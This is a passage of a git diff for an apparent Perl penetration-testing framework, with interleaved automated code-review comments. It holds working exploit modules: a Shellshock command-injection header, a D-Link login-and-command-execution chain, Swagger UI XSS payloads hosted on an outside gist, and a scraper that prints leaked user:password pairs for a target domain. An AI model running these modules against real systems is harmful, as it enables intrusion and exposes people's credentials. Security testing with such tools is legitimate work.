$module_path: $@"; + } + + my @run = $module_path->new(@parameters); my @results; foreach my $result (@run) { 
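Review bot: `Spellbook::Core::Helper -> new` no longer prints anything: the hunk replaces `print "..."; return 1;` with a `return` of the heredoc, so a caller that relied on the print now shows no banner unless it prints the returned string itself. The diffstat says spellbook.pl changes in this commit, but that hunk is not visible here, so the call site should be confirmed. The rewrite also drops the `\t` indentation of the command table and leaves `\n\n";` as literal text at the end of the heredoc body.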
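Review bot: `$module_path` in Core/Module.pm is built from the `category` and `module` fields of the resources data and handed to `Module::Load::load` without a format check. `load` treats an argument containing anything other than word characters and `::` as a file name, so a malformed or tampered registry entry could make it load a file rather than a `Spellbook::` package. A guard before the `eval`, such as `croak "Invalid module name: $module_path" if $module_path !~ /\A\w+(?:::\w+)*\z/;`, keeps the loader to package names. The error test can also be reduced to `if (!$success)`, because the block ends in `1;` and `$@` alone is not a reliable failure signal. The `foreach` body continues past the end of this hunk.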
@@ -27,7 +38,7 @@ package Spellbook::Core::Module { return @results; } } - + return "\n[!] Module not found.\n\n"; } } diff --git a/lib/Spellbook/Core/Orchestrator.pm b/lib/Spellbook/Core/Orchestrator.pm index b4a8a63..0c1c112 100644 --- a/lib/Spellbook/Core/Orchestrator.pm +++ b/lib/Spellbook/Core/Orchestrator.pm @@ -7,13 +7,13 @@ package Spellbook::Core::Orchestrator { use threads::shared; use Spellbook::Helper::Read_File; use List::MoreUtils qw(uniq); - + sub new { my ($self, $parameters) = @_; my ($help, $wordlist, $module, $list, $queue); my $threads = 10; - + Getopt::Long::GetOptionsFromArray ( $parameters, "h|help" => \$help, @@ -34,24 +34,24 @@ package Spellbook::Core::Orchestrator { $queue -> end(); my @results :shared; - + async { while (defined(my $target = $queue -> dequeue())) { my @response = Spellbook::Core::Module -> new ( $module, [ "--target" => $target, @$parameters ] ); - + lock(@results); - + if (@response) { push @results, @response; } } - } - + } + for 1 .. $threads; - while (threads -> list(threads::running) > 0) { + while (threads -> list(threads::running) > 0) { $_ -> join() for threads -> list(threads::all); } @@ -59,13 +59,16 @@ package Spellbook::Core::Orchestrator { } if ($help) { - return " - \rCore::Orchestrator - \r============== - \r\t-h, --help See this menu - \r\t-t, --threads Number of threads - \r\t-w, --wordlist Wordlist file - \r\t-e, --entrypoint Module to execute\n\n"; + return<<"EOT"; + +Core::Orchestrator +============== +-h, --help See this menu +-t, --threads Number of threads +-w, --wordlist Wordlist file +-e, --entrypoint Module to execute\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/CORS_Misconfig.pm b/lib/Spellbook/Exploit/CORS_Misconfig.pm index 72fb36c..7dd342c 100644 --- a/lib/Spellbook/Exploit/CORS_Misconfig.pm +++ b/lib/Spellbook/Exploit/CORS_Misconfig.pm 
@@ -14,17 +14,17 @@ package Spellbook::Exploit::CORS_Misconfig { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $useragent = Spellbook::Core::UserAgent -> new (); my @payloads = ("*", "null", "https://spellbook.xpl", "$target.spellbook.xpl"); # "test.$target", "http://" foreach my $payload (@payloads) { my $request = $useragent -> get($target, "Origin" => $payload); my $header = $request -> header("access-control-allow-origin"); - + if ($header) { if ($header eq $payload) { push @results, $target; @@ -36,11 +36,14 @@ package Spellbook::Exploit::CORS_Misconfig { } if ($help) { - return " - \rExploit::CORS_Misconfing - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::CORS_Misconfing +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/DataBreach.pm b/lib/Spellbook/Exploit/DataBreach.pm index c500fad..e68d700 100644 --- a/lib/Spellbook/Exploit/DataBreach.pm +++ b/lib/Spellbook/Exploit/DataBreach.pm @@ -4,7 +4,7 @@ package Spellbook::Exploit::DataBreach { use JSON; use Spellbook::Core::UserAgent; use Spellbook::Core::Credentials; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @results); @@ -20,7 +20,7 @@ package Spellbook::Exploit::DataBreach { my $endpoint = "https://haveibeenpwned.com/api/v3/breachedaccount/$target?includeUnverified=true&truncateResponse=false"; my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> get($endpoint, "hibp-api-key" => $credentials); - + if ($request -> code() == 200) { my $data = decode_json($request -> decoded_content()); 
@@ -36,11 +36,14 @@ package Spellbook::Exploit::DataBreach { } if ($help) { - return " - \rExploit::Databreach - \r============== - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::Databreach +============== +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } } } diff --git a/lib/Spellbook/Exploit/Django_DEBUG.pm b/lib/Spellbook/Exploit/Django_DEBUG.pm index 2949057..9102e89 100755 --- a/lib/Spellbook/Exploit/Django_DEBUG.pm +++ b/lib/Spellbook/Exploit/Django_DEBUG.pm @@ -1,4 +1,4 @@ -package Spellbook::Exploit::Django_Debug { +package Spellbook::Exploit::Django_DEBUG { use strict; use warnings; use Spellbook::Core::UserAgent; @@ -15,7 +15,7 @@ package Spellbook::Exploit::Django_Debug { ); if ($target){ - if ($target !~ /^http(s)?:\/\//){ + if ($target !~ /^http(?:s)?:\/\//x){ $target = "https://$target"; } @@ -32,16 +32,19 @@ package Spellbook::Exploit::Django_Debug { } } } - + return @results } if ($help) { - return " - \rExploit::Django_Debug - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target"; + return<<"EOT"; + +Exploit::Django_Debug +======================= +-h, --help See this menu +-t, --target Define a target"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Fullchain_DLINK.pm b/lib/Spellbook/Exploit/Fullchain_DLINK.pm index e7d8540..f2d49a5 100644 --- a/lib/Spellbook/Exploit/Fullchain_DLINK.pm +++ b/lib/Spellbook/Exploit/Fullchain_DLINK.pm @@ -7,7 +7,7 @@ package Spellbook::Exploit::Fullchain_DLINK { use Spellbook::Recon::Query_Shodan; use Spellbook::Advisory::CVE_2020_9376; use Spellbook::Advisory::CVE_2020_9377; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $payload, @results); 
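Review bot: The help banner in the `@@ -32,16 +32,19 @@` hunk of Django_DEBUG.pm still prints `Exploit::Django_Debug`, although the first hunk renames the package to `Spellbook::Exploit::Django_DEBUG` to match the file name. Change the banner line to `Exploit::Django_DEBUG`, and confirm that the `module` value in the module registry uses the same spelling (not visible here), since Core::Module compares names with `eq`. The heredoc body also ends with a leftover `";` after `Define a target`. In the same hunk the context line `return @results` has no terminating semicolon and is valid only because it is the last statement in its block.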
@@ -20,23 +20,23 @@ package Spellbook::Exploit::Fullchain_DLINK { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $target]); if ($credentials) { - my ($username, $password) = split /:/, $credentials; + my ($username, $password) = split /:/x, $credentials; - if (!$password) { + if (!$password) { $password = "admin"; } if ($username) { my $userAgent = LWP::UserAgent->new(); - my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; - + my $login_payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; + my $headers = HTTP::Headers->new ( "Content-Type" => "application/x-www-form-urlencoded", "Cookie" => "uid=zwUEueUOvi", @@ -48,16 +48,16 @@ package Spellbook::Exploit::Fullchain_DLINK { "Connection" => "keep-alive" ); - my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $payload); + my $request = HTTP::Request -> new("POST", "$target/session.cgi", $headers, $login_payload); my $response = $userAgent -> request($request); - - if ($response -> is_success) { + + if ($response -> is_success) { my @exploit = Spellbook::Advisory::CVE_2020_9377 -> new ([ "--target" => $target, "--cookie" => "zwUEueUOvi", "--payload" => "uname -a" ]); - + if ($exploit[0] ne "Authenication fail") { push @results, @exploit; } @@ -69,12 +69,15 @@ package Spellbook::Exploit::Fullchain_DLINK { } if ($help) { - return " - \rExploit::Fullchain_DLINK - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-p, --payload Send a command\n\n"; + return<<"EOT"; + +Exploit::Fullchain_DLINK +======================= +-h, --help See this menu +-t, --target Define a target +-p, --payload Send a command\n\n"; + +EOT } return 0; 
diff --git a/lib/Spellbook/Exploit/HAProxy_Exposed.pm b/lib/Spellbook/Exploit/HAProxy_Exposed.pm index b40ca6c..1ccdb33 100644 --- a/lib/Spellbook/Exploit/HAProxy_Exposed.pm +++ b/lib/Spellbook/Exploit/HAProxy_Exposed.pm @@ -1,7 +1,7 @@ package Spellbook::Exploit::HAProxy_Exposed { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -14,14 +14,17 @@ package Spellbook::Exploit::HAProxy_Exposed { if ($target) { return @result; - } + } if ($help) { - return " - \rExploit::HAProxy_Exposed - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Exploit::HAProxy_Exposed +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Headers_Misconfig.pm b/lib/Spellbook/Exploit/Headers_Misconfig.pm index fa75e01..168352c 100644 --- a/lib/Spellbook/Exploit/Headers_Misconfig.pm +++ b/lib/Spellbook/Exploit/Headers_Misconfig.pm @@ -15,7 +15,7 @@ package Spellbook::Exploit::Headers_Misconfig { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -35,16 +35,19 @@ package Spellbook::Exploit::Headers_Misconfig { push @results, "$target don't have $header header."; } } - + return @results; } if ($help) { - return " - \rExploit::Headers_Misconfig - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::Headers_Misconfig +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Mixed_Content.pm b/lib/Spellbook/Exploit/Mixed_Content.pm index c54967a..211bfbc 100644 --- a/lib/Spellbook/Exploit/Mixed_Content.pm +++ b/lib/Spellbook/Exploit/Mixed_Content.pm 
@@ -2,7 +2,7 @@ package Spellbook::Exploit::Mixed_Content { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result, @urls); @@ -15,18 +15,18 @@ package Spellbook::Exploit::Mixed_Content { if ($target) { if ($target =~ /^http:\/\//x) { - $target =~ s/^http:\/\///x; + $target =~ s/^http:\/\///x; } - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new (); my $request = $userAgent -> get($target); for (($request -> content =~ /src="([^"]+)"/gx) || ($request -> content =~ /href="([^"]+)"/gx)){ - push @urls, $1; + push @urls, $1; } foreach my $url (@urls) { @@ -36,15 +36,17 @@ package Spellbook::Exploit::Mixed_Content { } return @result; - } + } if ($help) { - return " - \rExploit::Mixed_Content - \r===================== - \r-h, --help See this menu - \r-t, --target Define a target to perform the analysis\n - "; + return<<"EOT"; + +Exploit::Mixed_Content +===================== +-h, --help See this menu +-t, --target Define a target to perform the analysis\n; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/None_Attack.pm b/lib/Spellbook/Exploit/None_Attack.pm index dfc794b..4ae6efe 100644 --- a/lib/Spellbook/Exploit/None_Attack.pm +++ b/lib/Spellbook/Exploit/None_Attack.pm @@ -1,8 +1,8 @@ package Spellbook::Exploit::None_Attack { use strict; use warnings; - - sub new { + + sub new { my ($self, $parameters) = @_; my ($help, @result); @@ -13,13 +13,16 @@ package Spellbook::Exploit::None_Attack { if (1) { return @result; - } + } if ($help) { - return " - \rExploit::None_Attack - \r===================== - \r-h, --help See this menu\n\n"; + return<<"EOT"; + +Exploit::None_Attack +===================== +-h, --help See this menu\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Pwn_DB.pm b/lib/Spellbook/Exploit/Pwn_DB.pm index a3a976b..64fa9a8 100644 
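Review bot: The `for ((... =~ /src="([^"]+)"/gx) || (... =~ /href="([^"]+)"/gx))` loop that the `@@ -15,18 +15,18 @@` hunk re-indents does not collect every URL. `||` evaluates its left side in scalar context, so when any `src` attribute exists the loop runs once and pushes only the first capture. Otherwise it pushes the last `href` capture once per match, because the body reads `$1` instead of the loop variable. A single list-context match avoids both: `push @urls, $request -> content =~ /(?:src|href)="([^"]+)"/gx;`. As written, the checker can report a page as clean while most of its resources were never inspected; the enclosing `new` begins and ends outside the hunk.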
--- a/lib/Spellbook/Exploit/Pwn_DB.pm +++ b/lib/Spellbook/Exploit/Pwn_DB.pm @@ -17,7 +17,7 @@ package Spellbook::Exploit::Pwn_DB { if ($target) { my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> post( - "https://pwndb2am4tzkvold.tor2web.io/", + "https://pwndb2am4tzkvold.tor2web.io/", Content => "luser=&domain=$target&luseropr=0&domainopr=0&submitform=em" ); @@ -29,19 +29,21 @@ package Spellbook::Exploit::Pwn_DB { while ($content =~ /\[luser\] => ([^\n]+)[^\)]+\[password\] => ([^\n]+)/mgx) { if ($1 ne "donate") { print "$1\@$target:$2\n"; - } + } } - } + } } } - + if ($help) { - return " - \rExploit::Pwn_DB - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n - "; + return<<"EOT"; + +Exploit::Pwn_DB +======================= +-h, --help See this menu +-t, --target Define a target\n; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Redis_Unauth.pm b/lib/Spellbook/Exploit/Redis_Unauth.pm index afb0625..a055494 100644 --- a/lib/Spellbook/Exploit/Redis_Unauth.pm +++ b/lib/Spellbook/Exploit/Redis_Unauth.pm @@ -3,7 +3,7 @@ package Spellbook::Exploit::Redis_Unauth { use warnings; use Redis; use Try::Tiny; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -21,27 +21,30 @@ package Spellbook::Exploit::Redis_Unauth { try { my $redis = Redis -> new ( - server => $target, + server => $target, name => "Spellbook", cnx_timeout => 45 ); - + my $requirepass = $redis -> config_get ("requirepass") -> [1]; - + if (!defined($requirepass) || $requirepass eq "") { push @result, $target; } }; return @result; - } + } if ($help) { - return " - \rExploit::Redis_Exposed - \r===================== - \r-h, --help See this menu - \r-t, --target Set a target to detect misconfigurations\n\n"; + return<<"EOT"; + +Exploit::Redis_Exposed +===================== +-h, --help See this menu +-t, --target Set a target to detect misconfigurations\n\n"; + +EOT } return 0; 
diff --git a/lib/Spellbook/Exploit/Reflected_XSS.pm b/lib/Spellbook/Exploit/Reflected_XSS.pm index 59beaad..2e66736 100644 --- a/lib/Spellbook/Exploit/Reflected_XSS.pm +++ b/lib/Spellbook/Exploit/Reflected_XSS.pm @@ -31,7 +31,7 @@ package Spellbook::Exploit::Reflected_XSS { $params -> remove($name); $params -> append($name, $payload); - + $parsed_url -> query($params); try { @@ -47,16 +47,19 @@ package Spellbook::Exploit::Reflected_XSS { } } } - + return @result; } if ($help) { - return " - \rExploit::Reflected_XSS - \r===================== - \r-h, --help See this menu - \r-t, --target Set an website to see paths from WayBackMachine\n"; + return<<"EOT"; + +Exploit::Reflected_XSS +===================== +-h, --help See this menu +-t, --target Set an website to see paths from WayBackMachine\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm index 2a353b1..60cce59 100644 --- a/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm +++ b/lib/Spellbook/Exploit/S3_Bucket_Takeover.pm @@ -14,7 +14,7 @@ package Spellbook::Exploit::S3_Bucket_Takeover { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } @@ -29,14 +29,17 @@ package Spellbook::Exploit::S3_Bucket_Takeover { } return @result; - } + } if ($help) { - return " - \rExploit::S3_Bucket_Takeover - \r===================== - \r-h, --help See this menu - \r-t, --target Check the possibility to takeover an s3 resource\n"; + return<<"EOT"; + +Exploit::S3_Bucket_Takeover +===================== +-h, --help See this menu +-t, --target Check the possibility to takeover an s3 resource\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Shellshock.pm b/lib/Spellbook/Exploit/Shellshock.pm index 3b2e4a9..870e30f 100644 --- a/lib/Spellbook/Exploit/Shellshock.pm +++ b/lib/Spellbook/Exploit/Shellshock.pm 
@@ -19,7 +19,7 @@ package Spellbook::Exploit::Shellshock { agent => "() { :; }; echo; echo; /bin/bash -c 'ls'" ); - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -31,12 +31,15 @@ package Spellbook::Exploit::Shellshock { } if ($help) { - return " - \rExploit::Shellshock - \r===================== - \r-h, --help See this menu - \r-t, --target Define a target - \r-c, --command Define a command to delivery\n\n"; + return<<"EOT"; + +Exploit::Shellshock +===================== +-h, --help See this menu +-t, --target Define a target +-c, --command Define a command to delivery\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Subdomain_Takeover.pm b/lib/Spellbook/Exploit/Subdomain_Takeover.pm index 1b1832a..43e250e 100644 --- a/lib/Spellbook/Exploit/Subdomain_Takeover.pm +++ b/lib/Spellbook/Exploit/Subdomain_Takeover.pm 
@@ -9,65 +9,71 @@ package Spellbook::Exploit::Subdomain_Takeover { my ($self, $parameters) = @_; my ($help, $target, @results); - Getopt::Long::GetOptionsFromArray ( + my %service_fingerprints = ( + "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br", + "1eb970ce5a18bec7165f016df8238566" => "github.github.io", + "387caa8a924c5f92496824494b929207" => "heroku.com", + "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br", + "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io", + "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com", + "308be540e2821668fb15c42317b1a256" => "wpengine.com", + "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com", + "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com", + "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net", + "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net", + ); + + Getopt::Long::GetOptionsFromArray( $parameters, "h|help" => \$help, "t|target=s" => \$target ); - if ($target) { - $target =~ s/^http(s)?:\/\///x; - - my $resolv = Net::DNS::Resolver -> new(); - my $reply = $resolv -> search($target); - - if ($reply) { - $target = "https://$target"; - - foreach my $rr ($reply -> answer()) { - if ($rr -> can("cname")) { - my %hashes = ( - "68934a3e9455fa72420237eb05902327" => "cname.greatpages.com.br", - "1eb970ce5a18bec7165f016df8238566" => "github.github.io", - "387caa8a924c5f92496824494b929207" => "heroku.com", - "595e88012a6521aae3e12cbebe76eb9e" => "pages.rdstation.com.br", - "fdda6b9858b843b34663e01f0bcce558" => "hosting.gitbook.io", - "6e3eb000e6dfd2ee60de7a9c53d33489" => "sslproxy.teamwork.com", - "308be540e2821668fb15c42317b1a256" => "wpengine.com", - "cb4c751c4bd5d73750c59db5621a6faa" => "shops.myshopify.com", - "1d9896e6c6994806305469581db3bf1d" => "proxy-ssl.webflow.com", - "a9de491af0529a118b4d456566c2b34a" => "sites.hubspot.net", - "52822a49f5e0b29181fb66c744ff6b6e" => "wixdns.net", - # "9043fb5164b8a1a5fea8031025fe9ef8" => "firebase", - # 
"648e671c67c7aee4eae2918e7cfbf5e4" => "squarespace.com" - ); - - foreach (%hashes) { - if ($rr -> cname() =~ m/$_/x) { - my $useragent = Spellbook::Core::UserAgent -> new(); - my $request = $useragent -> get($target); - - if ($request -> code() == 200 || $request -> code() == 404) { - my $md5 = md5_hex($request -> content()); - - return @results, $target if $hashes{$md5}; - } - } - } + if ($help) { + return <<"EOT"; + +Exploit::Subdomain_Takeover_Check +============== +-h, --help See this menu +-t, --target Define a target + +EOT + } + + return @results unless $target; + + $target =~ s/^http(s)?:\/\///x; + + my $resolv = Net::DNS::Resolver->new(); + my $reply = $resolv->search($target); + + return @results unless $reply; + + $target = "https://$target"; + + foreach my $dns_resource ($reply->answer()) { + next unless $dns_resource->can("cname"); + + my $cname = $dns_resource->cname(); + + while (my ($hash, $service) = each %service_fingerprints) { + next unless $cname =~ m/$service/x; + + my $useragent = Spellbook::Core::UserAgent->new(); + my $response = $useragent->get($target); + + if ($response->code() == 200 || $response->code() == 404) { + my $content_hash = md5_hex($response->content()); + + if ($hash eq $content_hash) { + push @results, $target; + last; } } } - - return @results; } - if ($help) { - return " - \rExploit::Subdomain_Takeover_Check - \r============== - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; - } + return @results; } } diff --git a/lib/Spellbook/Exploit/Swagger_XSS.pm b/lib/Spellbook/Exploit/Swagger_XSS.pm index 4fd032c..4972d0c 100644 --- a/lib/Spellbook/Exploit/Swagger_XSS.pm +++ b/lib/Spellbook/Exploit/Swagger_XSS.pm 
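Review bot: The `while (my ($hash, $service) = each %service_fingerprints)` loop is left with `last`, which does not reset the hash iterator. For the next `$dns_resource`, `each` resumes after the entry that matched and the earlier fingerprints are skipped. Iterating with `for my $hash (keys %service_fingerprints)` and reading `my $service = $service_fingerprints{$hash};` avoids the shared iterator. The service name is also interpolated as a pattern in `m/$service/x`, where each `.` matches any character; `m/\Q$service\E/x` keeps the comparison literal and cuts false matches on look-alike CNAMEs. The `sub new {` line is above the hunk.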
@@ -1,71 +1,67 @@ package Spellbook::Exploit::Swagger_XSS { + use strict; use warnings; use Spellbook::Core::UserAgent; sub new { my ($self, $parameters) = @_; - my ($help, $target, @result); + my ($help, $target, @vulnerable_endpoints); - Getopt::Long::GetOptionsFromArray ( + Getopt::Long::GetOptionsFromArray( $parameters, "h|help" => \$help, "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(s)?:\/\//x) { - $target = "https://$target"; - } - - $target =~ s/\/$//x; - my $useragent = Spellbook::Core::UserAgent -> new(); - - my @paths = ( - "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs", "/api/swagger", "/api/swagger-ui", "/api/swagger.json", - "/api/v2/api-docs", "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json", "/docs/v2/api-docs", - "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html", "/api/v1/swagger-ui.html", "/v1/swagger-ui.html", - "/api/v2/swagger-ui.html", "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html" - ); - - foreach my $path (@paths) { - my $request = $useragent -> get("$target$path"); - - if ($request -> code() == 200) { - if ($request -> content() =~ /(.*)<\/title>/x) { - my $title = $1; - - if ($title =~ /Swagger UI/x) { - my @payloads = ( - "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml", - "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json" - ); - - foreach my $payload (@payloads) { - my $endpoint = $target . $path . 
$payload; - my $request = $useragent -> get($endpoint); - - if ($request -> code() == 200) { - push @result, $endpoint; - } - } - } - } - } - } + if ($help) { + return <<"EOT"; +Exploit::Swagger_XSS +===================== +-h, --help See this menu +-t, --target Set a target - return @result; +EOT } - if ($help) { - return " - \rExploit::Swagger_XSS - \r===================== - \r-h, --help See this menu - \r-t, --target Set a target\n\n"; + return 0 unless $target; + + $target = "https://$target" unless $target =~ /^http(?:s)?:\/\//x; + $target =~ s/\/$//x; + + my $useragent = Spellbook::Core::UserAgent->new(); + + my @paths = ( + "/swagger", "/swagger-ui", "/swagger.json", "/v2/api-docs", "/api-docs", + "/api/swagger", "/api/swagger-ui", "/api/swagger.json", "/api/v2/api-docs", + "/api/api-docs", "/docs/swagger", "/docs/swagger-ui", "/docs/swagger.json", + "/docs/v2/api-docs", "/docs/api-docs", "/swagger-ui.html", "/api/swagger-ui.html", + "/api/v1/swagger-ui.html", "/v1/swagger-ui.html", "/api/v2/swagger-ui.html", + "/v2/swagger-ui.html", "/api/v3/swagger-ui.html", "/v3/swagger-ui.html" + ); + + my @payloads = ( + "?url=https://gist.githubusercontent.com/htrgouvea/df8a1a495c96c9942adc003884bc6b30/raw/92202a78d99d6c284b675ed34cf882895d75dfb4/payload-swagger-ui.yml", + "?configUrl=https://gist.githubusercontent.com/htrgouvea/86e17124610e7550295533e9d7bac571/raw/cf690c6862d38e02a081a9d580510ba8fff28bef/payload-swagger-ui.json" + ); + + foreach my $path (@paths) { + my $base_url = "$target$path"; + my $initial_response = $useragent->get($base_url); + + next unless $initial_response->code() == 200; + next unless $initial_response->content() =~ /<title>(.*)<\/title>/x; + next unless $1 =~ /Swagger UI/; + + foreach my $payload (@payloads) { + my $test_url = $base_url . $payload; + my $test_response = $useragent->get($test_url); + + push @vulnerable_endpoints, $test_url if $test_response->code() == 200; + } } - - return 0; + + return @vulnerable_endpoints; } } 
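Review bot: `push @vulnerable_endpoints, $test_url if $test_response->code() == 200;` records a finding on the status code alone, and the hunk checks nothing else about the second response. A 200 only shows that the Swagger UI page was served again with an extra query parameter, not that the instance honours `url` or `configUrl`. Any Swagger UI found on the path list is therefore likely to be reported, patched or not. I would rename the list to something like `@candidate_endpoints` and add the comment `# 200 = page served; the query parameter is not proven to be honoured, confirm manually`, or gate the result on a version check if the page exposes one.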
diff --git a/lib/Spellbook/Exploit/Upload_Via_PUT.pm b/lib/Spellbook/Exploit/Upload_Via_PUT.pm index 53a4f67..6829372 100644 --- a/lib/Spellbook/Exploit/Upload_Via_PUT.pm +++ b/lib/Spellbook/Exploit/Upload_Via_PUT.pm @@ -15,7 +15,7 @@ package Spellbook::Exploit::Upload_Via_PUT { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -32,11 +32,14 @@ package Spellbook::Exploit::Upload_Via_PUT { } if ($help) { - return " - \rRecon::Explioit - \r===================== - \r-h, --help See this menu - \r-t, --target Define\n\n"; + return<<"EOT"; + +Recon::Explioit +===================== +-h, --help See this menu +-t, --target Define\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/CDN_Checker.pm b/lib/Spellbook/Helper/CDN_Checker.pm index 686884c..caa1bd5 100644 --- a/lib/Spellbook/Helper/CDN_Checker.pm +++ b/lib/Spellbook/Helper/CDN_Checker.pm 
@@ -7,54 +7,52 @@ package Spellbook::Helper::CDN_Checker { use Spellbook::Recon::Get_IP; sub new { - my ($self, $parameters) = @_; - my ($help, $target, @result); + my ($self, $parameters) = @_; + my ($help, $target, @result); - Getopt::Long::GetOptionsFromArray ( - $parameters, - "h|help" => \$help, - "t|target=s" => \$target - ); + Getopt::Long::GetOptionsFromArray ( + $parameters, + "h|help" => \$help, + "t|target=s" => \$target + ); + + return <<"EOT" if $help; + +Helper::CDN_Checker +===================== +-h, --help See this menu +-t --target Define a target\n\n"; + +EOT + + return 0 unless $target; - if ($target) { my $ip = Spellbook::Recon::Get_IP -> new (["--target" => $target]); + return 0 unless $ip; + + my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json"; + my $useragent = Spellbook::Core::UserAgent -> new (); + my $request = $useragent -> get($cnd_list); + + return 0 unless $request->code == 200; - if ($ip) { - my $cnd_list = "https://raw.githubusercontent.com/projectdiscovery/cdncheck/main/cmd/generate-index/sources_data.json"; - my $useragent = Spellbook::Core::UserAgent -> new (); - my $request = $useragent -> get($cnd_list); - - if ($request -> code == 200) { - my $data = decode_json($request -> content); - my $content = $data -> {"cdn"}; # we have others options - - for (keys %{$content}) { - for (@{$content -> {$_}}) { - my $range = Net::IP -> new($_); - my $value = Net::IP -> new($ip); - my $match = $range -> overlaps($value); - - if ($match) { - push @result, $target; - } - } + my $data = decode_json($request -> content); + my $content = $data -> {"cdn"}; # we have others options + + my $target_ip = Net::IP->new($ip); + + for my $provider (keys %{$content}) { + for my $range (@{$content->{$provider}}) { + my $cdn_range = Net::IP->new($range); + if ($cdn_range->overlaps($target_ip)) { + push @result, $target; + return @result; } } } return @result; } - - if ($help) { - return " - 
\rHelper::CDN_Checker - \r===================== - \r-h, --help See this menu - \r-t --target Define a target\n\n"; - } - - return 0; - } } 1; \ No newline at end of file diff --git a/lib/Spellbook/Helper/Exifs_Write.pm b/lib/Spellbook/Helper/Exifs_Write.pm index ea7fb0b..efe40a5 100755 --- a/lib/Spellbook/Helper/Exifs_Write.pm +++ b/lib/Spellbook/Helper/Exifs_Write.pm @@ -44,12 +44,15 @@ package Spellbook::Helper::Exifs_Write { } if ($help) { - return " - \rHelper::Exifs_Write - \r===================== - \r-h, --help See this menu - \r-f, --file Define a file write the payload - \r-p --payload Set a payload to write into file\n\n"; + return<<"EOT"; + +Helper::Exifs_Write +===================== +-h, --help See this menu +-f, --file Define a file write the payload +-p --payload Set a payload to write into file\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Helper/Generate_UUID.pm b/lib/Spellbook/Helper/Generate_UUID.pm index eeb9157..e80b5c6 100644 --- a/lib/Spellbook/Helper/Generate_UUID.pm +++ b/lib/Spellbook/Helper/Generate_UUID.pm @@ -19,20 +19,23 @@ package Spellbook::Helper::Generate_UUID { if ($version) { for (my $i = 1; $i <= $repeat; $i++) { my $generate = create_uuid_as_string($version); - + push @result, $generate; } - + return 